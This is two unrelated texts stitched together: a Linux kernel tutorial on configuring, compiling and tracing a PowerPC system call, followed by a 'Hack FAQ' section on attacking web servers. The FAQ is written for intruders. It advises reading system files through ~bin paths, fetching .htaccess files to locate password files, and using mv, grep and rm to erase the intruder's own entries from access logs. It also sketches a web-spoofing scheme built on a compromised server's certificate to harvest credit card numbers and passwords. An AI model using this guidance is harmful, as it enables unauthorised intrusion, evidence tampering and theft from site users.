    If you have a working .config file for your machine, just copy it into your kernel source directory and run make oldconfig. You should double check the configuration with make menuconfig. If you don't already have a.config file, you can create one by visiting each submenu and turning on or off the options you need. menuconfig and xconfig have a "Help" option that shows you the Configure.help entry for that option, which may help you decide whether or not it should be turned on. RedHat and other distributions often include sample .config files with their distribution specific kernel source in a subdirectory named configs in the top-level source directory. If you are compiling for PowerPC, you have a variety of default configs to choose from inarch/ppc/configsmake defconfig will copy the default ppc config file to .config. If you know another source of default configuration files, let us know.
    Tips for configuring a kernel:
    1. Always turn on "Prompt for development... drivers".
    2. From kernel 2.6.8, you can add your own string (such as your initials) at "Local version - append to kernel release" to personalize your kernel version string (for older kernel versions, you have to edit the EXTRAVERSION line in the Makefile).
    3. Always turn off module versioning, but always turn on kernel module loader, kernel modules and module unloading.
    4. In the kernel hacking section, turn on all options except for "Use 4Kb for kernel stacks instead of 8Kb". If you have a slow machine, don't turn on "Debug memory allocations" either.
    5. Turn off features you don't need.
    6. Only use modules if you have a good reason to use a module. For example, if you are working on a driver, you'll want to load a new version of it without rebooting.
    7. Be extra sure you selected the right processor type. Find out what processor you have now with cat /proc/cpuinfo.
    8. Find out what PCI devices you have installed with lspci -v.
    9. Find out what your current kernel has compiled in with dmesg | less. Most device drivers print out messages when they detect a device.
    If all else fails, copy a .config file from someone else.
  12. Compile Your Kernel
    At this point, you have your kernel source, and you've run one of the configuration programs and (very important) saved your new configuration file. Don't laugh - I've done this many times.
    First, build the kernel:
    On an x86:
    # make -j<number of jobs> bzImage
    On a PPC:
    # make -j<number of jobs> zImage
    Where <number of jobs> is two times the number of cpus in your system. So if you have a single cpu Pentium III, you'd do:
    # make -j2 bzImage
    What the -j argument tells the make program is to run that many jobs (commands in the Makefile) at once. make knows which jobs can be run at the same time and which jobs need to wait for other jobs to finish before they can run. Kernel compilation jobs spend enough time waiting for I/O (for example, reading the source file from disk) that running two of the jobs per processor results in the shortest compilation time. NOTE: If you get a compile error, runmake with only one job so that it's easy to see where the error occurred. Otherwise, the error message will be hidden in the output from the other makejobs.
    If you have enabled modules, you'll need to compile them with the command:
    # make modules
    If you are planning on loading these modules on the same machine they are compiled on, then run the automatic module install command. But FIRST - save your old modules!
    # mv /lib/modules/`uname -r` /lib/modules/`uname r`.bak
       # make modules_install
    This will put all the modules in subdirectories of the/lib/modules/<version> directory. You can find out what <version> is by looking in include/linux/version.h.

    Recompiling the kernel

    So, now you've compiled the kernel once. Now you want to change part of the kernel and recompile it. What do you need to do?
    In most cases, simply running make -j2 bzImage (or whatever your kernel compile command is) again will do the trick. If you've altered a module's source file, then just do make modules and make modules_install (if appropriate).
    Sometimes, you'll change things so much that make can't figure out how to recompile the files correctly. make clean will remove all the object and kernel object files (ending in .o and .ko) and a few other things. make mrproperwill do everything make clean does, plus remove your config file, the dependency files, and everything else that make config creates. Be sure to save your config file in another file before running make mrproper. Afterwards, copy the config file back to .config and start over, beginning atmake menuconfig. A make mrproper will often fix strange kernel crashes that make no sense and strange compilation errors that make no sense.
    Here are some tips for recompilation when you are working on just one or two files. Say you are changing the file drivers/char/foo.c and you are having trouble getting it to compile at all. You can just type (from thedrivers/char/ directory) make -C path/to/kernel/src SUBDIRS=$PWD modules and make will immediately attempt to compile the modules in that directory, instead of descending through all the subdirectories in order and looking for files that need recompilation. Ifdrivers/char/foo.c is a module, you can then insmod thedrivers/char/foo.ko file when it actually does compile, without going through the full-blown make modules command. If drivers/char/foo.cis not a module, you'll then have to run make -j2 bzImage to link it with all the other parts of the kernel.
    The && construct in bash is very useful for kernel compilation. The bash command line:
    # thing1 && thing2
    Says, "Do thing1, and if it doesn't return an error, do thing2." This is useful for doing something only if a compile command succeeds.
    When I'm working on a module, I often use the following command:
    # rmmod foo.ko && make -C path/to/kernel/src SUBDIRS=$PWD modules \
         && insmod foo.ko
    This says, "Remove the module foo.ko, and if that succeeds, compile the modules in drivers/char/, and if that succeeds, load the kernel module object file." That way, if I get a compile error, it doesn't load the old module file and it's obvious that I need to fix my code.
    Don't let yourself get too frustrated! If you just can't figure out what's going on, try the make mrproper command. If you still can't figure it out, post your question on grrls-only. It's good to try to figure things out by yourself, but it's not good if it makes you give up trying at all.
  13. Understanding System Calls
    By now, you're probably looking around at device driver code and wondering, "How does the function foo_read() get called?" Or perhaps you're wondering, "When I type cat /proc/cpuinfo, how does the cpuinfo()function get called?"
    Once the kernel has finished booting, the control flow changes from a comparatively straightforward "Which function is called next?" to being dependent on system calls, exceptions, and interrupts. Today, we'll talk about system calls.

    What is a system call?

    In the most literal sense, a system call (also called a "syscall") is an instruction, similar to the "add" instruction or the "jump" instruction. At a higher level, a system call is the way a user level program asks the operating system to do something for it. If you're writing a program, and you need to read from a file, you use a system call to ask the operating system to read the file for you.

    System calls in detail

    Here's how a system call works. First, the user program sets up the arguments for the system call. One of the arguments is the system call number (more on that later). Note that all this is done automatically by library functions unless you are writing in assembly. After the arguments are all set up, the program executes the "system call" instruction. This instruction causes an exception: an event that causes the processor to jump to a new address and start executing the code there.
    The instructions at the new address save your user program's state, figure out what system call you want, call the function in the kernel that implements that system call, restores your user program state, and returns control back to the user program. A system call is one way that the functions defined in a device driver end up being called.
    That was the whirlwind tour of how a system call works. Next, we'll go into minute detail for those who are curious about exactly how the kernel does all this. Don't worry if you don't quite understand all of the details - just remember that this is one way that a function in the kernel can end up being called, and that no magic is involved. You can trace the control flow all the way through the kernel - with difficulty sometimes, but you can do it.

    A system call example

    This is a good place to start showing code to go along with the theory. We'll follow the progress of a read() system call, starting from the moment the system call instruction is executed. The PowerPC architecture will be used as an example for the architecture specific part of the code. On the PowerPC, when you execute a system call, the processor jumps to the address 0xc00. The code at that location is defined in the file:
    arch/ppc/kernel/head.S
    It looks something like this:
    /* System call */
            . = 0xc00
    SystemCall:
            EXCEPTION_PROLOG
            EXC_XFER_EE_LITE(0xc00, DoSyscall)
    
    /* Single step - not used on 601 */
            EXCEPTION(0xd00, SingleStep, SingleStepException, EXC_XFER_STD)
            EXCEPTION(0xe00, Trap_0e, UnknownException, EXC_XFER_EE)
    
    What this code does is save some state and call another function calledDoSyscall. Here's a more detailed explanation (feel free to skip this part):
    EXCEPTION_PROLOG is a macro that handles the switch from user to kernel space, which requires things like saving the register state of the user process.EXC_XFER_EE_LITE is called with the address of this routine, and the address of the function DoSyscall. Eventually, some state will be saved andDoSyscall will be called. The next two lines save two exception vectors on the addresses 0xd00 and 0xe00.
    EXC_XFER_EE_LITE looks like this:
    #define EXC_XFER_EE_LITE(n, hdlr)       \
            EXC_XFER_TEMPLATE(n, hdlr, n+1, COPY_EE, transfer_to_handler, \
                              ret_from_except)
    
    EXC_XFER_TEMPLATE is another macro, and the code looks like this:
    #define EXC_XFER_TEMPLATE(n, hdlr, trap, copyee, tfer, ret)     \
            li      r10,trap;                                       \
            stw     r10,TRAP(r11);                                  \
            li      r10,MSR_KERNEL;                                 \
            copyee(r10, r9);                                        \
            bl      tfer;                                           \
    i##n:                                                           \
            .long   hdlr;                                           \
            .long   ret
    
    li stands for "load immediate", which means that a constant value known at compile time is stored in a register. First, trap is loaded into the register r10. On the next line, that value is stored on the address given by TRAP(r11).TRAP(r11) and the next two lines do some hardware specific bit manipulation. After that we call the tfer function (i.e. thetransfer_to_handler function), which does yet more housekeeping, and then transfers control to hdlr (i.e. DoSyscall). Note thattransfer_to_handler loads the address of the handler from the link register, which is why you see .long DoSyscall instead of bl DoSyscall.
    Now, let's look at DoSyscall. It's in the file:
    arch/ppc/kernel/entry.S
    Eventually, this function loads up the address of the syscall table and indexes into it using the system call number. The syscall table is what the OS uses to translate from a system call number to a particular system call. The system call table is named sys_call_table and defined in:
    arch/ppc/kernel/misc.S
    The syscall table contains the addresses of the functions that implement each system call. For example, the read() system call function is namedsys_read. The read() system call number is 3, so the address ofsys_read() is in the 4th entry of the system call table (since we start numbering the system calls with 0). We read the data from the addresssys_call_table + (3 * word_size) and we get the address ofsys_read().
    After DoSyscall has looked up the correct system call address, it transfers control to that system call. Let's look at where sys_read() is defined, in the file:
    fs/read_write.c
    This function finds the file struct associated with the fd number you passed to the read() function. That structure contains a pointer to the function that should be used to read data from that particular kind of file. After doing some checks, it calls that file-specific read function in order to actually read the data from the file, and then returns. This file-specific function is defined somewhere else - the socket code, filesystem code, or device driver code, for example. This is one of the points at which a specific kernel subsystem finally interfaces with the rest of the kernel. After our read function finishes, we return from thesys_read(), back to DoSyscall(), which switches control toret_from_except, which is in defined in:
    arch/ppc/kernel/entry.S
    This checks for tasks that might need to be done before switching back to user mode. If nothing else needs to be done, we fall through to the restorefunction, which restores the user process's state and returns control back to the user program. There! Your read() call is done! If you're lucky, you even got your data back.
    You can explore syscalls further by putting printks at strategic places. Be sure to limit the amount of output from these printks. For example, if you add aprintk to sys_read() syscall, you should do something like this:
    static int mycount = 0;
    
      if (mycount < 10) {
               printk ("sys_read called\n");
        mycount++;
      }
    
    Have fun!

The Hack FAQ

10.0 The Basic Web Server
This section deals with other platforms but it mainly refers to Unix-based Web servers.

10.1 What are the big weak spots on servers?

The big weak spots are as follows - Server running HTTPD as root. This means that anytime a user attaches to the web server they are running as root. Very powerful if there are any holes at all. This means that if your browser can find a way in, you can gain access to anything on the system. -Improper checking and buffering of user data by CGI scripts. Either a buffer can be overrun or arbitrary commands can be sent to the server. -Improper configuration of the server itself or the web server, allowing for access to files not intended for the general public. This could include log files, the htpasswd file, and web server configuration files. But the main problem is a CGI interpreter (perl.exe on an NT web server leaps to mind) that allows a browser to execute server commands, launch shells, rename or append files, etc.

10.2 What are the critical files?

They are as follows(the names may vary depending on the httpd server you're running):
httpd.conf
Contains all of the info to configure the httpd service.
srm.conf
Contains the info as to where scripts and documents reside.
access.conf
Defines the service features for all browsers.
.htaccess
Limits access on a directory-by-directory basis.

10.3 What's the difference between httpd running as a daemon vs. running under inetd?

Performance. If httpd is running as a standalone daemon, it read its configuration files once, and responses faster to user requests. Typically, if a site is expecting many users, the server is dedicated. This can be as simple as starting httpd as follows:
# httpd &
Of course, the site will probably have something like this in the /etc/rc0 (or equivalent file) so that httpd starts on bootup:
if [ -x /path/to/httpd ]
/path/to/httpd
fi
Most sites with web servers accessible to the Internet run as a standalone daemon. The downside is if the web service isn't being used all of the time then the server is wasting CPU running a web service with no one accessing it.
Running httpd under inetd starts and stops as user requests come in. The performance isn't as good -- as the server spawns httpd for each user, the configuration files are read in for each request. It is usually run by having a line in /etc/services like this:
http 80/tcp
There is an entry like this in /etc/inetd.conf:
http stream tcp nowait nobody /path/to/httpd httpd
This type of setup is most common on intranets. Very few Internet servers are set up this way, unless they are simply not very busy or the site is simply trying to save resources, combining web, ftp, and a few other services on one box.

10.4 How does the server resolve paths?

Typically, a server will resolve paths by having a point in the configuration files that says something like "turn ~ into public_html", which means that ~thegnome will resolve to /server/path/to/documents + public_html. Therefore, if your server's path to docs is /usr/local/etc/httpd/htdocs with a sub directory under that of public_html with all of the users' directories under THAT, http://www.example.com/pub/public_html/thegnome becomes http://www.example.com/~thegnome and accesses the same file.
The problem with resolves is that some sites (depending on software, revisions, os, patches, etc) will resolve based off of the /etc/passwd listing of the home directory. This is good for intrusion, bad for security. As stated earlier in the FAQ, accessing http://www.example.com/~bin/etc/ can yield interesting results. In practical experience, we've seen this more often on BSD derivatives with Apache than anything else.

10.5 What log files are used by the server?

This entirely depends on the server software and how it is configured. It is usually in a subdirectory called "logs" in a different section of the tree than the regular web pages. It is usually named "access_log" for Apache or NCSA, or "access" for Netscape, or some other easily self-identifying name. This log will contain entries like so:
thegnome.example.com - - [14/Dec/1996:00:13:31 -0600] "GET /nomad/ HTTP/1.0" 200 293
thegnome.example.com - - [14/Dec/1996:00:13:35 -0600] "GET /nomad/2.html HTTP/1.0" 200 303
thegnome.example.com - - [14/Dec/1996:00:13:39 -0600] "GET /nomad/3.html HTTP/1.0" 200 333
thegnome.example.com - - [14/Dec/1996:00:13:43 -0600] "GET /nomad/4.html HTTP/1.0" 200 359
thegnome.example.com - - [14/Dec/1996:00:13:47 -0600] "GET /nomad/5.html HTTP/1.0" 200 385
thegnome.example.com - - [14/Dec/1996:00:13:51 -0600] "GET /nomad/6.html HTTP/1.0" 200 434
thegnome.example.com - - [14/Dec/1996:00:13:55 -0600] "GET /nomad/nomad.html HTTP/1.0" 200 1988
thegnome.example.com - - [14/Dec/1996:00:14:02 -0600] "GET /nomad/unix/index.html HTTP/1.0" 200 5066
thegnome.example.com - - [14/Dec/1996:00:14:28 -0600] "GET /nomad/unix/cvnmount.exploit HTTP/1.0" 200 3117
Obviously, if your phf accesses are in there, it could be incriminating. If you gain access, you might want to eliminate yourself from them.
  1. mv access_log access_tmp
  2. cat access_tmp | grep -v thegnome.fastlane.net > access_log
  3. rm access_tmp
The same with the error log. Called error_log or error, it's entries look like so:
[Thu Dec 19 22:10:02 1996] access to /usr/local/etc/httpd/htdocs/nomad/faqs/netware.htm failed for dyn2121a.dialin.example.com, reason: File does not exist
[Thu Dec 19 22:10:21 1996] access to /usr/local/etc/httpd/htdocs/nomad/faqs/_free.html_ failed for dyn2121a.dialin.example.com, reason: File does not exist
[Thu Dec 19 23:29:35 1996] access to /usr/local/etc/httpd/htdocs/nomad/HTTP failed for niobe.example.com, reason: File does not exist
[Thu Dec 19 23:48:19 1996] send script output lost connection to client ip189.raleigh3.nc.example.com
[Thu Dec 19 23:48:25 1996] send script output lost connection to client 10.0.1.1
[Fri Dec 20 09:19:13 1996] accept: Connection reset by peer
[Fri Dec 20 09:19:13 1996] - socket error: accept failed
[Fri Dec 20 10:35:41 1996] accept: Connection reset by peer
[Fri Dec 20 10:35:41 1996] - socket error: accept failed
[Fri Dec 20 10:39:55 1996] access to /usr/local/etc/httpd/htdocs/nomad/unix/Xtx86.c failed for 192.168.1.1, reason: File does not exist

10.6 How do access restrictions work?

This is going to vary from platform to platform, but we're going to use NCSA as an example. We're not going into a lot of detail, the point is that service can be limited, and to give a flavor of how easy it is for an admin to set up.
Restricting Access by Host Name:
In NCSA this is in access.conf, and you can specify the following:
allow
host names allowed
AllowOveride
determines whether per-directory access overrides global access restrictions
deny
host names denied
There are more options depending on OS, server software, etc., and you can get pretty detailed. But most server software allows access restriction by host names.
Restricting Access by Directory:
This is usually accomplished by specifying a realpath/to/directory tag with the restrictions following, and then closing with an ending tag of , all within the access.conf file. For example, let's say the admin wants to limit a directory to company employees only on an NCSA server:
<Limit GET>
        order deny,allow
        deny from all
        allow from mydomain.org
Include those lines in a .htaccess file in the directory you wish to limit and bingo, you're limiting access.

10.7 How do password restrictions work?

This typically involves the admin performing the following functions:
Building each user id/password as needed. Updating the main configuration files to recognize that passwords are being used. Updating any .htaccess files in individual directories.
The command line syntax for creating a user ID and password (on NCSA) is:
htpasswd [-c] .htpasswdUserName
UserName is the name of the user file you wish to create or edit. The -c option specifies a new file be created, not the old one edited. If you are creating a new UserName file, and htpasswd doesn't find a duplicate name, you will be prompted for the password. If it finds a duplicate name, it will prompt you to type it in twice. These passwords do not correspond to system passwords, so if you are an idiot wannabe hacker and you just got into a server with a shell, don't expect to create a root account with htpasswd and then su to it.
In NSCA, you will find the following in the access.conf file indicating passwords are in use:
<Directory /usr/stuff/WWW/docs>
        AllowOverride None
        Options Indexes
        AuthName secretPassword
        AuthType Basic
        AuthUserFile /usr/WWW/security/.htpasswd
        AuthGroupFile /usr/WWW/security/NULL
        <Limit GET>
                require user UserName
        
For a directory-level usage, this might be in the .htaccess file:
AuthName secretPassword
AuthType Basic
AuthUserFile /usr/WWW/security/.htpasswd
AuthGroupFile /usr/WWW/security/.group1
<Limit GET>
        require user UserName
Once again, we're not going to go into a lot of detail here. You need to read the documentation for the server you're attacking (i.e. do your homework) and THEN start changing or updating files. For example, .htaccess is the name of the file for NCSA and its derivatives.
One of the good things for intruders is that if an admin is using per-directory restrictions you can often retrieve these files just like a regular URL. For example, if the target is restricting access to the /usr/local/etc/httpd/docs/secure directory using a .htaccess file to control access, this URL might retrieve it (depending on server software):
http://www.example.com/secure/.htaccess
Besides containing important info, it will give you the location of the web passwd file.

10.8 What is web spoofing?

Summed up, web spoofing is a man-in-the-middle attack that makes the user think they have a secured session with one specific web server, when in fact they have a secured session with an attacker's server. At that point, the attacker could persuade the user to supply credit card or other personal info, passwords, etc. You get the idea.
Here's how it works in a nut shell:
  • The attacker has compromised XYZ Company's web site, using DNS spoofing, or some other means such as being listed in a search engine to provide an intercept to XYZ.
  • The user wants to visit XYZ Company's web site and clicks on a link.
  • The attacker has built their own SSL certificate and the domain in this certificate looks to the user's browser as authentic.
  • The user gets the solid key and now assumes all is safe and will be encrypted and secure.
  • The attacker's forms on this trojan site may include fields for passwords, credit cards, bank accounts, etc. and the unknowing user provides this info to the attacker as they use the forms.
What is the problem here? It is not SSL. It is the certificates. You see, as long as you have what looks to be the proper info in the certificate, the user will never know the difference. Sure, the URL might not look right, but you can use Java to control that.
Of course, only an idiot would redirect a user to a server in their home or office, you would of course redirect them to a server you have compromised. And you would use the compromised server's certificate to get that solid key. That's the trick -- make the key solid, and the user is fooled.